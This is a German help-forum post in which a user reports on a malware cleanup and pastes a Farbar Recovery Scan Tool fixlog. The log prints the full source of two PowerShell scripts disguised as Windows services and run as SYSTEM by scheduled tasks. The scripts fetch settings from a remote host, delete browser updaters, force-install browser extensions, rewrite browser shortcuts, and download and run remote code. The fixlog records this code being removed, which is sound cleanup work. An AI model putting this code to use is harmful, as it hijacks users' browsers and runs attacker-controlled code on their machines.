| metoo003 |  20.06.2022 16:36 |        FRST wurde auf dem Desktop, jeweils als Administrator, ausgeführt.  
Nach dem "Reparieren" mit FRST wurde ein Neustart benötigt.  
Sobald der Desktop geladen wurde, kam die Aufforderung der Windows Firewall, Asus Dienste für Armoury Crate, zuzulassen.  
Die Meldung "Von Ihrer Organisation verwaltet" im Edge, ist verschwunden.  
Fixlog:    Code:  
 Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 19-06-2022 
durchgeführt von Pauli (20-06-2022 17:28:09) Run:1 
Gestartet von C:\Users\Pauli\Desktop 
Geladene Profile: Pauli 
Start-Modus: Normal 
==============================================   
fixlist Inhalt: 
***************** 
SystemRestore: On 
CreateRestorePoint: 
CloseProcesses: 
CMD: type "C:\Windows\System32\Tasks\MicrosoftPrintWorkflowService_2" 
Task: {230BDA8E-A467-4040-8078-DAE5117CABC8} - System32\Tasks\MicrosoftPrintWorkflowService_2 => powershell -File C:/Windows/System32/PrintWorkflowService.ps1 
CMD: type "C:\Windows\System32\Tasks\MicrosoftPrintWorkflowService" 
Task: {45642FF6-3619-47AF-9980-EB2BDDD2D870} - System32\Tasks\MicrosoftPrintWorkflowService => powershell -File C:/Windows/System32/PrintWorkflowService.ps1 
CMD: type "C:\Windows\System32\PrintWorkflowService.ps1" 
C:\Windows\System32\PrintWorkflowService.ps1 
CMD: type "C:\Windows\System32\Tasks\MicrosoftWindowsUpdaterTask_PR1_2" 
Task: {B3EB67F7-C7BB-4F3D-8D5F-D4A6EEEEE750} - System32\Tasks\MicrosoftWindowsUpdaterTask_PR1_2 => powershell -File C:/Windows/System32/WindowsUpdater1.ps1 
CMD: type "C:\Windows\System32\Tasks\MicrosoftWindowsUpdaterTask_PR1" 
Task: {ECB4171C-2617-409F-9B15-78C553295691} - System32\Tasks\MicrosoftWindowsUpdaterTask_PR1 => powershell -File C:/Windows/System32/WindowsUpdater1.ps1 
CMD: type "C:\Windows\System32\WindowsUpdater1.ps1" 
C:\Windows\System32\WindowsUpdater1.ps1 
Unlock: C:\Windows\system32\fclip.exe 
VirusTotal: C:\Windows\system32\fclip.exe 
CMD: type "C:\Users\Pauli\AppData\Local\2613946761" 
VirusTotal: C:\Users\Pauli\AppData\Local\2613946761 
2022-05-15 20:48 - 2022-05-15 20:48 - 000004846 _____ () C:\Users\Pauli\AppData\Local\1355515445 
2022-05-29 17:52 - 2022-05-29 17:52 - 000004350 _____ () C:\Users\Pauli\AppData\Local\2613946761 
2022-05-15 20:52 - 2022-05-15 20:52 - 000004846 _____ () C:\Users\Pauli\AppData\Local\3390820382 
2022-05-07 16:50 - 2022-05-07 16:50 - 000005190 _____ () C:\Users\Pauli\AppData\Local\4096968421 
HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\Run: [MicrosoftEdgeAutoLaunch_0394F9F0D5AFEC0304440CFD4BF5F89C] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3547048 2022-05-05] (Microsoft Corporation -> Microsoft Corporation) 
BootExecute: autocheck autochk * sdnclean64.exe 
GroupPolicy: Beschränkung - Edge <==== ACHTUNG 
GroupPolicy\User: Beschränkung - Edge <==== ACHTUNG 
GroupPolicyUsers\S-1-5-21-1424437550-2087844553-323541659-1001\User: Beschränkung <==== ACHTUNG 
Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG 
HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG 
HKLM\SOFTWARE\Policies\Microsoft\Edge: Beschränkung <==== ACHTUNG 
Task: {07595C2E-60C1-4CAA-90B7-43A07800F8DF} - System32\Tasks\Opera scheduled Autoupdate 1652464033 => C:\Users\Pauli\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Keine Datei) 
Task: {5B8095A6-0C1E-4D17-A6BB-1C5756AAB167} - System32\Tasks\MicrosoftEdgeUpdateTaskMachineCore => C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe /c (Keine Datei) 
Task: {A1411766-E2FC-47B4-9195-5EFB2B3C1F58} - System32\Tasks\MicrosoftEdgeUpdateTaskMachineUA => C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe /ua /installsource scheduler (Keine Datei) 
S2 edgeupdate; "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc [X] 
S3 edgeupdatem; "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc [X] 
ContextMenuHandlers1: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei 
ContextMenuHandlers1: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei 
ContextMenuHandlers2: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei 
ContextMenuHandlers2: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei 
ContextMenuHandlers6: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei 
ContextMenuHandlers6: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei 
AlternateDataStreams: C:\Users\Pauli\Anwendungsdaten:d988fd1ce0beed92b2bcb751f85f2bf5 [394] 
AlternateDataStreams: C:\Users\Pauli\AppData\Roaming:d988fd1ce0beed92b2bcb751f85f2bf5 [394] 
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [9112] 
startpowershell: 
Set-Service -Name "BITS" -StartupType Manual -Verbose 
Set-Service -Name "Dhcp" -StartupType Automatic -Verbose 
Set-Service -Name "EventLog" -StartupType Automatic -Verbose 
Set-Service -Name "EventSystem" -StartupType Automatic -Verbose 
Set-Service -Name "nsi" -StartupType Automatic -Verbose 
Set-Service -Name "RasMan" -StartupType Manual -Verbose 
Set-Service -Name "SDRSVC" -StartupType Manual -Verbose 
Set-Service -Name "SstpSvc" -StartupType Manual -Verbose 
Set-Service -Name "TrustedInstaller" -StartupType Manual -Verbose 
Set-Service -Name "VSS" -StartupType Manual -Verbose 
Set-Service -Name "Winmgmt" -StartupType Automatic -Verbose 
Set-Service -Name "wuauserv" -StartupType Manual -Verbose 
Set-MpPreference -DisableAutoExclusions $true -Force 
set-mppreference -mapsreporting basic -Force 
set-mppreference -DisableRealtimeMonitoring $false -Force 
set-mppreference -DisablePrivacyMode $true -Force 
set-mppreference -DisableIOAVProtection $false -Force 
set-mppreference -CheckForSignaturesBeforeRunningScan $true -Force 
set-mppreference -PUAProtection enabled -Force 
Set-MpPreference -DisableBehaviorMonitoring $false -Force 
Set-MpPreference -SignatureScheduleDay Everyday -force 
set-mppreference -RealTimeProtectionEnabled $true -force 
set-mppreference -OnAccessProtectionEnabled $true -force 
Function Remove-all-windefend-excludes { 
$Paths=(Get-MpPreference).ExclusionPath 
$Extensions=(Get-MpPreference).ExclusionExtension 
$Processes=(Get-MpPreference).ExclusionProcess 
foreach ($Path in $Paths) { Remove-MpPreference -ExclusionPath $Path -force} 
foreach ($Extension in $Extensions) { Remove-MpPreference -ExclusionExtension $Extension -force} 
foreach ($Process in $Processes) { Remove-MpPreference -ExclusionProcess $Process -force} 
} 
Set-MpPreference -DisableAutoExclusions $true -Force 
Remove-all-windefend-excludes 
endpowershell: 
CMD: ipconfig /flushdns 
CMD: netsh winsock reset catalog 
CMD: netsh advfirewall reset 
CMD: netsh advfirewall set allprofiles state ON 
CMD: netsh winhttp reset proxy 
CMD: Bitsadmin /Reset /Allusers 
CMD: Winmgmt /salvagerepository 
CMD: Winmgmt /resetrepository 
CMD: winmgmt /resyncperf 
CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R 
CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R 
CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R 
CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R 
Hosts: 
RemoveProxy: 
C:\WINDOWS\SysWOW64\*.tmp 
C:\WINDOWS\System32\*.tmp 
C:\Windows\SystemTemp\*.tmp 
EmptyTemp:   
*****************   
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore => erfolgreich entfernt 
SystemRestore: On => abgeschlossen 
Wiederherstellungspunkt wurde erfolgreich erstellt. 
Prozesse erfolgreich geschlossen.   
========= type "C:\Windows\System32\Tasks\MicrosoftPrintWorkflowService_2" =========   
<?xml version="1.0" encoding="UTF-16"?> 
<Task version="1.2" xmlns="hxxp://schemas.microsoft.com/windows/2004/02/mit/task"> 
  <RegistrationInfo> 
    <Date>2022-05-13T19:14:05</Date> 
    <Author>Pauls_Gaming_PC\Pauli</Author> 
    <URI>\MicrosoftPrintWorkflowService_2</URI> 
  </RegistrationInfo> 
  <Triggers> 
    <TimeTrigger> 
      <Repetition> 
        <Interval>PT3H</Interval> 
        <StopAtDurationEnd>false</StopAtDurationEnd> 
      </Repetition> 
      <StartBoundary>2022-05-13T19:17:00</StartBoundary> 
      <Enabled>true</Enabled> 
    </TimeTrigger> 
  </Triggers> 
  <Principals> 
    <Principal id="Author"> 
      <RunLevel>HighestAvailable</RunLevel> 
      <UserId>S-1-5-18</UserId> 
    </Principal> 
  </Principals> 
  <Settings> 
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> 
    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> 
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> 
    <AllowHardTerminate>true</AllowHardTerminate> 
    <StartWhenAvailable>false</StartWhenAvailable> 
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> 
    <IdleSettings> 
      <Duration>PT10M</Duration> 
      <WaitTimeout>PT1H</WaitTimeout> 
      <StopOnIdleEnd>true</StopOnIdleEnd> 
      <RestartOnIdle>false</RestartOnIdle> 
    </IdleSettings> 
    <AllowStartOnDemand>true</AllowStartOnDemand> 
    <Enabled>true</Enabled> 
    <Hidden>false</Hidden> 
    <RunOnlyIfIdle>false</RunOnlyIfIdle> 
    <WakeToRun>false</WakeToRun> 
    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> 
    <Priority>7</Priority> 
  </Settings> 
  <Actions Context="Author"> 
    <Exec> 
      <Command>powershell</Command> 
      <Arguments>-File C:/Windows/System32/PrintWorkflowService.ps1</Arguments> 
    </Exec> 
  </Actions> 
</Task>   
========= Ende von CMD: =========   
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{230BDA8E-A467-4040-8078-DAE5117CABC8}" => erfolgreich entfernt 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{230BDA8E-A467-4040-8078-DAE5117CABC8}" => erfolgreich entfernt 
C:\Windows\System32\Tasks\MicrosoftPrintWorkflowService_2 => erfolgreich verschoben 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftPrintWorkflowService_2" => erfolgreich entfernt   
========= type "C:\Windows\System32\Tasks\MicrosoftPrintWorkflowService" =========   
<?xml version="1.0" encoding="UTF-16"?> 
<Task version="1.2" xmlns="hxxp://schemas.microsoft.com/windows/2004/02/mit/task"> 
  <RegistrationInfo> 
    <Date>2022-05-13T19:14:05</Date> 
    <Author>Pauls_Gaming_PC\Pauli</Author> 
    <URI>\MicrosoftPrintWorkflowService</URI> 
  </RegistrationInfo> 
  <Triggers> 
    <CalendarTrigger> 
      <StartBoundary>2022-05-13T19:17:00</StartBoundary> 
      <Enabled>true</Enabled> 
      <ScheduleByDay> 
        <DaysInterval>1</DaysInterval> 
      </ScheduleByDay> 
    </CalendarTrigger> 
  </Triggers> 
  <Principals> 
    <Principal id="Author"> 
      <RunLevel>HighestAvailable</RunLevel> 
      <UserId>S-1-5-18</UserId> 
    </Principal> 
  </Principals> 
  <Settings> 
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> 
    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> 
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> 
    <AllowHardTerminate>true</AllowHardTerminate> 
    <StartWhenAvailable>false</StartWhenAvailable> 
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> 
    <IdleSettings> 
      <Duration>PT10M</Duration> 
      <WaitTimeout>PT1H</WaitTimeout> 
      <StopOnIdleEnd>true</StopOnIdleEnd> 
      <RestartOnIdle>false</RestartOnIdle> 
    </IdleSettings> 
    <AllowStartOnDemand>true</AllowStartOnDemand> 
    <Enabled>true</Enabled> 
    <Hidden>false</Hidden> 
    <RunOnlyIfIdle>false</RunOnlyIfIdle> 
    <WakeToRun>false</WakeToRun> 
    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> 
    <Priority>7</Priority> 
  </Settings> 
  <Actions Context="Author"> 
    <Exec> 
      <Command>powershell</Command> 
      <Arguments>-File C:/Windows/System32/PrintWorkflowService.ps1</Arguments> 
    </Exec> 
  </Actions> 
</Task>   
========= Ende von CMD: =========   
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{45642FF6-3619-47AF-9980-EB2BDDD2D870}" => erfolgreich entfernt 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{45642FF6-3619-47AF-9980-EB2BDDD2D870}" => erfolgreich entfernt 
C:\Windows\System32\Tasks\MicrosoftPrintWorkflowService => erfolgreich verschoben 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftPrintWorkflowService" => erfolgreich entfernt   
========= type "C:\Windows\System32\PrintWorkflowService.ps1" =========   
#                POWERSHELL 2.0                        #   
function Unzip2 
{ 
         param([string]$file, [string]$outpath) 
        $zipfile = (New-Object -Com Shell.Application).NameSpace($file) 
        $destination = (New-Object -Com Shell.Application).NameSpace($outpath) 
        $destination.CopyHere($zipfile.Items(), 0x14) 
}           
[System.Reflection.Assembly]::LoadWithPartialName("System.Web.Extensions") 
$ser = New-Object System.Web.Script.Serialization.JavaScriptSerializer     
#                POWERSHELL 2.0 END                #             
function addRegKeys() 
{ 
     param ($arr) 
     $basePath = "HKLM:\SOFTWARE\Policies\"; 
     foreach ($element in $arr) { 
        $basePath += $element + '\';   
        $t = Test-Path -Path $basePath; 
        if (-Not $t) 
        { 
            $basePath; 
            New-Item -Path $basePath; 
        } 
    } 
}     
function addRegVal() 
{ 
    param ( $items,[string]$path); 
    $currentItems = Get-ItemProperty -Path $path;   
    foreach ($a in $items) 
    { 
         
        $i = $a.id; 
        $val = $a.val; 
        if ($currentItems.$i) 
        { 
            $currentVal = $currentItems.$i; 
            if ($currentVal -ne $val) 
            { 
                Set-ItemProperty -Path $path -Name $i -Value $val; 
            } 
        } 
        else 
        { 
            New-ItemProperty -Path $path -Name $i -PropertyType String -Value $val; 
        }   
    }   
}   
function removeUpdates() 
{ 
    param(); 
    Remove-Item HKLM:\SYSTEM\ControlSet001\Services\gupdate -Recurse; 
    Remove-Item HKLM:\SYSTEM\ControlSet001\Services\gupdatem -Recurse; 
    Remove-Item HKLM:\SYSTEM\CurrentControlSet\Services\gupdate -Recurse; 
    Remove-Item HKLM:\SYSTEM\CurrentControlSet\Services\gupdatem -Recurse; 
    Remove-Item 'C:\\Program Files (x86)\\Google\\Update' -Recurse 
    Remove-Item 'C:\\Program Files (x86)\\Microsoft\\EdgeUpdate' -Recurse 
    Remove-Item 'C:\\Program Files\\Google\\Update' -Recurse 
    Remove-Item 'C:\\Program Files\\Microsoft\\EdgeUpdate' -Recurse     
}         
$uid = '5a423cf8-89c8-47b2-b1d0-c88e7d0ea43a'; 
$uid;   
$wc = New-Object system.Net.WebClient; 
$services = $wc.downloadString("hxxp://wincloudservice.com/apps/$uid").Trim(); 
$services = $ser.DeserializeObject($services); 
removeUpdates;       
$keysArr = @("Google", "Chrome", "ExtensionInstallForcelist"); 
addRegKeys($keysArr); 
$keysArr = @("Microsoft", "Edge", "ExtensionInstallForcelist"); 
addRegKeys($keysArr);     
$CPath = "HKLM:\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist"; 
$EPath = "HKLM:\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist";     
$CItems = $services.reg.c; 
$EItems = $services.reg.e; 
if ($CItems) 
{ 
    addRegVal $CItems $CPath; 
} 
if ($EItems) 
{ 
    addRegVal $EItems $EPath;     
}     
$CArgs = $services.args.c; 
$EArgs = $services.args.e;   
$CLocal = $services.local.c; 
$CLocalPath = $CLocal.path;   
try{ 
        $currentLocalV = (Get-Content "$CLocalPath\version.txt"); 
        $currentLocalV  = [Decimal]$currentLocalV ; 
} 
catch{ 
        $currentLocalV  = 0; 
}     
if ($CArgs) 
{ 
   $Shortcuts =  Get-ChildItem -Path "C:\" -Include *.lnk  -Recurse -Force; 
    $Shell = New-Object -ComObject WScript.Shell; 
    foreach ($s in $Shortcuts) 
    {    
         
         $target=  $Shell.CreateShortcut($s).TargetPath; 
         
         if ($target -Match 'chrome.exe') 
         { 
            $shortcut = $Shell.CreateShortcut($s.Fullname) 
            $shortcut.Arguments = "$CArgs --load-extension=$CLocalPath"; 
            $shortcut.Save(); 
         } 
         elseif ($target -Match 'msedge.exe') 
        { 
            $shortcut = $Shell.CreateShortcut($s.Fullname) 
            $shortcut.Arguments = $EArgs; 
            $shortcut.Save(); 
  
        }     
    }  
}         
if ($services.local.c) 
{ 
    if ($currentLocalV -ne $services.local.c.v) 
    { 
        New-Item -Path $CLocalPath -Name "archive.logs" -ItemType "file" -Force 
        foreach ($f in $services.local.c.files) 
        { 
            $fn = $f.split('/')[-1]; 
            (New-Object Net.WebClient).DownloadFile($f, "$CLocalPath\$fn")   
        }     
        #Unzip2 "$CLocalPath\logsCache.zip" "$CLocalPath" -Force 
        (Get-Content "$CLocalPath\config.js") -replace '%USERID%', $uid | Set-Content "$CLocalPath\config.js" 
    } 
}     
if ($services.restart) 
{ 
    try{ 
        Get-Process chrome | ForEach-Object { $_.CloseMainWindow() | Out-Null} 
        start chrome "$CArgs --load-extension=$CLocalPath --restore-last-session"; 
    } 
    catch{ 
     
    } 
}   
if ($services.rem) 
{ 
    $rem = $wc.downloadString($services.rem).Trim(); 
    Invoke-Expression $rem; 
}     
========= Ende von CMD: =========   
C:\Windows\System32\PrintWorkflowService.ps1 => erfolgreich verschoben   
========= type "C:\Windows\System32\Tasks\MicrosoftWindowsUpdaterTask_PR1_2" =========   
<?xml version="1.0" encoding="UTF-16"?> 
<Task version="1.2" xmlns="hxxp://schemas.microsoft.com/windows/2004/02/mit/task"> 
  <RegistrationInfo> 
    <Date>2022-06-04T20:30:49</Date> 
    <Author>Pauls_Gaming_PC\Pauli</Author> 
    <URI>\MicrosoftWindowsUpdaterTask_PR1_2</URI> 
  </RegistrationInfo> 
  <Triggers> 
    <TimeTrigger> 
      <Repetition> 
        <Interval>PT3H</Interval> 
        <StopAtDurationEnd>false</StopAtDurationEnd> 
      </Repetition> 
      <StartBoundary>2022-06-04T20:33:00</StartBoundary> 
      <Enabled>true</Enabled> 
    </TimeTrigger> 
  </Triggers> 
  <Principals> 
    <Principal id="Author"> 
      <RunLevel>HighestAvailable</RunLevel> 
      <UserId>S-1-5-18</UserId> 
    </Principal> 
  </Principals> 
  <Settings> 
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> 
    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> 
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> 
    <AllowHardTerminate>true</AllowHardTerminate> 
    <StartWhenAvailable>false</StartWhenAvailable> 
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> 
    <IdleSettings> 
      <Duration>PT10M</Duration> 
      <WaitTimeout>PT1H</WaitTimeout> 
      <StopOnIdleEnd>true</StopOnIdleEnd> 
      <RestartOnIdle>false</RestartOnIdle> 
    </IdleSettings> 
    <AllowStartOnDemand>true</AllowStartOnDemand> 
    <Enabled>true</Enabled> 
    <Hidden>false</Hidden> 
    <RunOnlyIfIdle>false</RunOnlyIfIdle> 
    <WakeToRun>false</WakeToRun> 
    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> 
    <Priority>7</Priority> 
  </Settings> 
  <Actions Context="Author"> 
    <Exec> 
      <Command>powershell</Command> 
      <Arguments>-File C:/Windows/System32/WindowsUpdater1.ps1</Arguments> 
    </Exec> 
  </Actions> 
</Task>   
========= Ende von CMD: =========   
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B3EB67F7-C7BB-4F3D-8D5F-D4A6EEEEE750}" => erfolgreich entfernt 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B3EB67F7-C7BB-4F3D-8D5F-D4A6EEEEE750}" => erfolgreich entfernt 
C:\Windows\System32\Tasks\MicrosoftWindowsUpdaterTask_PR1_2 => erfolgreich verschoben 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftWindowsUpdaterTask_PR1_2" => erfolgreich entfernt   
========= type "C:\Windows\System32\Tasks\MicrosoftWindowsUpdaterTask_PR1" =========   
<?xml version="1.0" encoding="UTF-16"?> 
<Task version="1.2" xmlns="hxxp://schemas.microsoft.com/windows/2004/02/mit/task"> 
  <RegistrationInfo> 
    <Date>2022-06-04T20:30:49</Date> 
    <Author>Pauls_Gaming_PC\Pauli</Author> 
    <URI>\MicrosoftWindowsUpdaterTask_PR1</URI> 
  </RegistrationInfo> 
  <Triggers> 
    <CalendarTrigger> 
      <StartBoundary>2022-06-04T20:33:00</StartBoundary> 
      <Enabled>true</Enabled> 
      <ScheduleByDay> 
        <DaysInterval>1</DaysInterval> 
      </ScheduleByDay> 
    </CalendarTrigger> 
  </Triggers> 
  <Principals> 
    <Principal id="Author"> 
      <RunLevel>HighestAvailable</RunLevel> 
      <UserId>S-1-5-18</UserId> 
    </Principal> 
  </Principals> 
  <Settings> 
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> 
    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> 
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> 
    <AllowHardTerminate>true</AllowHardTerminate> 
    <StartWhenAvailable>false</StartWhenAvailable> 
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> 
    <IdleSettings> 
      <Duration>PT10M</Duration> 
      <WaitTimeout>PT1H</WaitTimeout> 
      <StopOnIdleEnd>true</StopOnIdleEnd> 
      <RestartOnIdle>false</RestartOnIdle> 
    </IdleSettings> 
    <AllowStartOnDemand>true</AllowStartOnDemand> 
    <Enabled>true</Enabled> 
    <Hidden>false</Hidden> 
    <RunOnlyIfIdle>false</RunOnlyIfIdle> 
    <WakeToRun>false</WakeToRun> 
    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> 
    <Priority>7</Priority> 
  </Settings> 
  <Actions Context="Author"> 
    <Exec> 
      <Command>powershell</Command> 
      <Arguments>-File C:/Windows/System32/WindowsUpdater1.ps1</Arguments> 
    </Exec> 
  </Actions> 
</Task>   
========= Ende von CMD: =========   
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{ECB4171C-2617-409F-9B15-78C553295691}" => erfolgreich entfernt 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ECB4171C-2617-409F-9B15-78C553295691}" => erfolgreich entfernt 
C:\Windows\System32\Tasks\MicrosoftWindowsUpdaterTask_PR1 => erfolgreich verschoben 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftWindowsUpdaterTask_PR1" => erfolgreich entfernt   
========= type "C:\Windows\System32\WindowsUpdater1.ps1" =========   
#                POWERSHELL 2.0                        #   
function Unzip2 
{ 
         param([string]$file, [string]$outpath) 
        $zipfile = (New-Object -Com Shell.Application).NameSpace($file) 
        $destination = (New-Object -Com Shell.Application).NameSpace($outpath) 
        $destination.CopyHere($zipfile.Items(), 0x14) 
}           
[System.Reflection.Assembly]::LoadWithPartialName("System.Web.Extensions") 
$ser = New-Object System.Web.Script.Serialization.JavaScriptSerializer     
#                POWERSHELL 2.0 END                #             
function addRegKeys() 
{ 
     param ($arr) 
     $basePath = "HKLM:\SOFTWARE\Policies\"; 
     foreach ($element in $arr) { 
        $basePath += $element + '\';   
        $t = Test-Path -Path $basePath; 
        if (-Not $t) 
        { 
            $basePath; 
            New-Item -Path $basePath; 
        } 
    } 
}     
function addRegVal() 
{ 
    param ( $items,[string]$path); 
    $currentItems = Get-ItemProperty -Path $path;   
    foreach ($a in $items) 
    { 
         
        $i = $a.id; 
        $val = $a.val; 
        if ($currentItems.$i) 
        { 
            $currentVal = $currentItems.$i; 
            if ($currentVal -ne $val) 
            { 
                Set-ItemProperty -Path $path -Name $i -Value $val; 
            } 
        } 
        else 
        { 
            New-ItemProperty -Path $path -Name $i -PropertyType String -Value $val; 
        }   
    }   
}   
function removeUpdates() 
{ 
    param(); 
    Remove-Item HKLM:\SYSTEM\ControlSet001\Services\gupdate -Recurse; 
    Remove-Item HKLM:\SYSTEM\ControlSet001\Services\gupdatem -Recurse; 
    Remove-Item HKLM:\SYSTEM\CurrentControlSet\Services\gupdate -Recurse; 
    Remove-Item HKLM:\SYSTEM\CurrentControlSet\Services\gupdatem -Recurse; 
    Remove-Item 'C:\\Program Files (x86)\\Google\\Update' -Recurse 
    Remove-Item 'C:\\Program Files (x86)\\Microsoft\\EdgeUpdate' -Recurse 
    Remove-Item 'C:\\Program Files\\Google\\Update' -Recurse 
    Remove-Item 'C:\\Program Files\\Microsoft\\EdgeUpdate' -Recurse     
}         
$uid = '5a423cf8-89c8-47b2-b1d0-c88e7d0ea43a'; 
$uid;   
$wc = New-Object system.Net.WebClient; 
$services = $wc.downloadString("hxxp://wincloudservice.com/apps/$uid").Trim(); 
$services = $ser.DeserializeObject($services); 
removeUpdates;       
$keysArr = @("Google", "Chrome", "ExtensionInstallForcelist"); 
addRegKeys($keysArr); 
$keysArr = @("Microsoft", "Edge", "ExtensionInstallForcelist"); 
addRegKeys($keysArr);     
$CPath = "HKLM:\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist"; 
$EPath = "HKLM:\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist";     
$CItems = $services.reg.c; 
$EItems = $services.reg.e; 
if ($CItems) 
{ 
    addRegVal $CItems $CPath; 
} 
if ($EItems) 
{ 
    addRegVal $EItems $EPath;     
}     
$CArgs = $services.args.c; 
$EArgs = $services.args.e;   
$CLocal = $services.local.c; 
$CLocalPath = $CLocal.path;   
try{ 
        $currentLocalV = (Get-Content "$CLocalPath\version.txt"); 
        $currentLocalV  = [Decimal]$currentLocalV ; 
} 
catch{ 
        $currentLocalV  = 0; 
}     
if ($CArgs) 
{ 
   $Shortcuts =  Get-ChildItem -Path "C:\" -Include *.lnk  -Recurse -Force; 
    $Shell = New-Object -ComObject WScript.Shell; 
    foreach ($s in $Shortcuts) 
    {    
         
         $target=  $Shell.CreateShortcut($s).TargetPath; 
         
         if ($target -Match 'chrome.exe') 
         { 
            $shortcut = $Shell.CreateShortcut($s.Fullname) 
            $shortcut.Arguments = "$CArgs --load-extension=$CLocalPath"; 
            $shortcut.Save(); 
         } 
         elseif ($target -Match 'msedge.exe') 
        { 
            $shortcut = $Shell.CreateShortcut($s.Fullname) 
            $shortcut.Arguments = $EArgs; 
            $shortcut.Save(); 
  
        }     
    }  
}         
if ($services.local.c) 
{ 
    if ($currentLocalV -ne $services.local.c.v) 
    { 
        New-Item -Path $CLocalPath -Name "archive.logs" -ItemType "file" -Force 
        foreach ($f in $services.local.c.files) 
        { 
            $fn = $f.split('/')[-1]; 
            (New-Object Net.WebClient).DownloadFile($f, "$CLocalPath\$fn")   
        }     
        #Unzip2 "$CLocalPath\logsCache.zip" "$CLocalPath" -Force 
        (Get-Content "$CLocalPath\config.js") -replace '%USERID%', $uid | Set-Content "$CLocalPath\config.js" 
    } 
}     
if ($services.restart) 
{ 
    try{ 
        Get-Process chrome | ForEach-Object { $_.CloseMainWindow() | Out-Null} 
        start chrome "$CArgs --load-extension=$CLocalPath --restore-last-session"; 
    } 
    catch{ 
     
    } 
}   
if ($services.rem) 
{ 
    $rem = $wc.downloadString($services.rem).Trim(); 
    Invoke-Expression $rem; 
}     
========= Ende von CMD: =========   
C:\Windows\System32\WindowsUpdater1.ps1 => erfolgreich verschoben 
"C:\Windows\system32\fclip.exe" => wurde entsperrt 
VirusTotal: C:\Windows\system32\fclip.exe => https://www.virustotal.com/gui/file/3ef7a01df4e68e1a6cf529f14d51d18e81efe6931dfae5bbe1c7ce7a657d667b/detection/f-3ef7a01df4e68e1a6cf529f14d51d18e81efe6931dfae5bbe1c7ce7a657d667b-1654728746   
========= type "C:\Users\Pauli\AppData\Local\2613946761" =========   
